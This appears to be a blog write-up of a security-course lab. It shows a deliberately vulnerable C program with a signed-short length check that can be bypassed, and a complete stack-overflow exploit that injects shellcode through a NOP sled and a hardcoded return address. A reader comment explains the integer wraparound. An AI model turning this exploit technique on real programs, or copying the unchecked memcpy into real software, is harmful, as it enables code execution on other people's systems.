Advertisements
Home > Information Technology, programming, Science, Security > Buffer Overflowing Target 4

Buffer Overflowing Target 4

target4.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int foo(char *arg, short arglen)
{
 int maxlen = 4032;
 char buf[4032];

 if (arglen < maxlen)
  memcpy(buf, arg, strlen(arg));
 return 0;
}

int main(int argc, char *argv[])
{
 int canary[10];
 canary[0] = 0;
 if (argc != 2)
 {
  fprintf(stderr, "target4: argc != 2\n");
  exit(EXIT_FAILURE);
 }

 foo(argv[1], strlen(argv[1]));
 if(canary[0] != 0) {
  exit(EXIT_FAILURE);
 }

 return 0;
}

sploit4.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "shellcode.h"

#define TARGET "/tmp/target4"

int main(void)
{
 char *args[3];
 char *env[1];
 char buf[32769];
 int i;

 for(i = 0; i<32769; i++){
  if(i<4032-strlen(shellcode))
   buf[i] = '\x90';
  else if(i<4032)
   buf[i] = shellcode[i-4032+strlen(shellcode)];
  else if(i<4048)
   buf[i] ='\x90';
  else if(i<4049)
   buf[i] = '\x7c';
  else if(i<4050)
   buf[i] = '\x6e';
  else if(i<4051)
   buf[i] = '\xff';
  else if(i<4052)
   buf[i] = '\xbf';
  else if(i<32768)
   buf[i] = '\x90';
  else
   buf[i] = '\x00';

 }

 args[0] = TARGET; args[1] = buf ; args[2] = NULL;
 env[0] = NULL;

 if (0 > execve(TARGET, args, env))
  fprintf(stderr, "execve failed.\n");

 return 0;
}
Advertisements
  1. Bob
    March 28, 2011 at 9:21 pm

    Is there any specific reason you use a buffer of size 32769? Or could you have just used a random number larger than 4052?

    • Ritu
      April 13, 2011 at 12:27 am

      32769 = -1 for signed short, following condition holds in foo and memcpy overwrites

      if (arglen < maxlen)
      memcpy(buf, arg, strlen(arg));

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

%d bloggers like this: